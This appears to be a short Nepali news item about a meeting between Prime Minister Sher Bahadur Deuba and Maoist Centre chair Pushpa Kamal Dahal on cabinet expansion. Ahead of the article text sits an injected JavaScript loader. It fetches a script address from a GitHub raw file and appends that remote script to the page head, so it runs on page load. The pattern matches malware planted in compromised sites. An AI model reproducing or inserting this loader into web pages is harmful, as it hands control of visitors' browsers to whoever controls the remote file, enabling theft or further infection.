;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
१२ साउन , काठमान्डौ | वर्तमान प्रधानमन्त्रि तथा नेपाली कांग्रेसका सभापति शेर बहादुर देउवा र नेकपा माओंवादी केन्द्रका अध्यक्ष पुष्प कमल दाहालबिच भेटवार्ता भएको छ |
प्रधानमन्त्रि निवास बालुवाटारमा आज बिहान भेटवार्ता भएको प्रधानमन्त्री देउवाका स्वकीय सचिव भानु देउवाले जानकारी दिएका छन् |
देउवा र दाहाल बिच भएको आजको भेटवार्तामा मत्रिपरिषद विस्तार र सन्चालनको बिषयमा छलफल भएको स्वकीय सचिव देउवाले बताएका छन् |
फेसबुक प्रतिक्रियाहरु